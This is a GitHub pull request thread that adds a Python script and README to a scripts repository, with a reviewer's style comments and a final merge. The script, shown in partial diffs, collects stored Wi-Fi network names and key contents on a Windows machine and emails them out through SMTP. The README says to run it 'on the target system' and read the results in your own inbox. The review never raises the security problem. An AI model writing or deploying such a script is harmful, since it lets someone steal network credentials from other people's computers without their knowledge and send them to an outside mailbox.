### PR TITLE
adding network passwords

### LINKED ISSUE #865: Script to find Network passwords
**This template is strictly for requesting New Scripts, if you want a new feature (automating this Repo,**
**a change in structure) in the Repo,** 
**or you want to report a Bug. There are other templates which you should follow**

# Description

This script find all the network passwords stored in a windows computer 

## Language

- [x] Python

## Checklist:

- **Details on the Script**

Wifi passwords

This is script is usefull when passwords of networks that are connected to the computer are lost

| name            | about                                                  | labels  | assignees                                                      |
| --------------- | ------------------------------------------------------ | ------- | -------------------------------------------------------------- |
| wifi passwords | Sends wifi passwords stored in a computer through mail | gssoc'21 | @aaadddiii |

**Is your feature request related to a problem? Please describe.**: A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

**Describe the solution you'd like**: A clear and concise description of what you want to happen.

**Additional context**: Add any other context or screenshots about the feature request here.

### PR DESCRIPTION
**Pull request by aaadddiii**
# Description

Please include a summary of the change and which issue is fixed. List any dependencies that are required for this change.

Fixes #865 

## Type of change

- [x] New feature (non-breaking change which adds functionality)

# Checklist:

- [x] My code follows the style guidelines(Clean Code) of this project
- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have created a helpful and easy to understand `README.md`
- [x] I have made corresponding changes to the documentation
- [x] My changes generate no new warnings
- [x] I have added tests/screenshots(if any) that prove my fix is effective or that my feature works

### CODE REVIEW

File: Python/Network_passwords/script.py [hunk 1]
```diff
@@ -0,0 +1,45 @@
+import subprocess, re, smtplib
+
+
+def send_mail(email, password, message):
```
Comment (vybhav72954) [inline Python/Network_passwords/script.py:4]: Missing Function Docstring

File: Python/Network_passwords/script.py [hunk 2]
```diff
@@ -0,0 +1,45 @@
...
+
+result = result.split("\\r\\n")
+content = ""
+for i in result:
+    if "SSID name" in i:
+        content += i + " "
+    if "Key Content" in i:
+        content += i + "\n\n"
+
+send_mail("<Enter your gmail>", "<Enter your gmail password>", content)
```
Comment (vybhav72954) [inline Python/Network_passwords/script.py:45]: Add a blank line here

File: Python/Network_passwords/README.md [hunk 3]
```diff
@@ -0,0 +1,28 @@
...
+## packages used 
+- [subprocess](https://docs.python.org/3/library/subprocess.html)
+- [smtp](https://docs.python.org/3/library/smtplib.html)
+- [re](https://docs.python.org/3/library/re.html)
+
+# How to run program
+**1.**  Fork [this](https://github.com/HarshCasper/Rotten-Scripts) repository.
+
+**2.**  Clone your forked copy of the project.
+```
```
Comment (vybhav72954) [inline Python/Network_passwords/README.md:12]: Add language attribute to the code fence

File: Python/Network_passwords/README.md [hunk 4]
```diff
@@ -0,0 +1,28 @@
...
+git clone https://github.com/<your-user-name>/Rotten-Scripts.git
+```
+Navigate to the project directory.
+```bash
+cd \Rotten-Scripts\Python\Network_passwords
+```
+open wifi-passwords.py file and give your email and password on the send_mail function before running the program on the target system
```
Comment (vybhav72954) [inline Python/Network_passwords/README.md:19]: Start with a Capital Letter

**Review by vybhav72954 — CHANGES_REQUESTED** [review]
I have done a basic review.

I don't like the README at all!

It doesn't align with the template, see a few other READMEs in this Repo and make the necessary changes.

File: Python/Network_passwords/README.md [hunk 5]
```diff
@@ -0,0 +1,28 @@
+# Get Stored passwords in target system
+This python script once executed on a windows target system will send the stored network passwords via given mail.
+## packages used
```
Comment (vybhav72954) [inline Python/Network_passwords/README.md:3]: Start with Capital Letter please

File: Python/Network_passwords/README.md [hunk 6]
```diff
@@ -0,0 +1,28 @@
...
+Open wifi-passwords.py file and give your email and password on the send_mail function before running the program on the target system
+## To run
+```bash
+python script.py
+```
+
+# Output
+open inbox of your given mail to see the output
+
+![](https://i.postimg.cc/HnJhW7FJ/pic.png)
```
Comment (vybhav72954) [inline Python/Network_passwords/README.md:28]: Consider adding your name as Author

File: Python/Network_passwords/script.py (hunk 1 above)
Comment (vybhav72954) [reply Python/Network_passwords/script.py:4]: Please add a Docstring

**Review by vybhav72954 — CHANGES_REQUESTED** [review]
The README looks good.

Just one more suggestion

```
# Head 1
<Blank>
Random things
<Blank>
## Head 2 (can be any heading for that matter)
<Blank>
Random things again
```

Please insert blank lines before and after every heading (except before the top most heading)

**Comment by aaadddiii** [comment]
Necessary changes made

File: Python/Network_passwords/script.py [hunk 7]
```diff
@@ -0,0 +1,48 @@
+import subprocess, re, smtplib
+
+'''
```
Comment (vybhav72954) [inline Python/Network_passwords/script.py:3]: This is not how a docstring should be.
Pls change it like this
```
def send_mail(email, password, message):
    '''
    send_mail function sends the list of passwords through given email
    '''
```

File: Python/Network_passwords/script.py [hunk 8]
```diff
@@ -0,0 +1,48 @@
...
+
+result = result.split("\\r\\n")
+content = ""
+for i in result:
+    if "SSID name" in i:
+        content += i + " "
+    if "Key Content" in i:
+        content += i + "\n\n"
+'''Enter your email and password in the function parameters'''
+send_mail("<Enter your gmail>", "<Enter your gmail password>", content)
```
Comment (vybhav72954) [inline Python/Network_passwords/script.py:47]: Use a `.env` file here, please.
Use `decouple` module.


[This](https://github.com/HarshCasper/Rotten-Scripts/tree/master/Python/Github_Traffic) script can be used for reference.

Upload a ```.env.example``` file.

**Review by vybhav72954 — CHANGES_REQUESTED** [review]

**Comment by aaadddiii** [comment]
@vybhav72954 I have made changes , can you review it

**Review by vybhav72954 — APPROVED** [review]
Changes are apt.

**Pull request merged**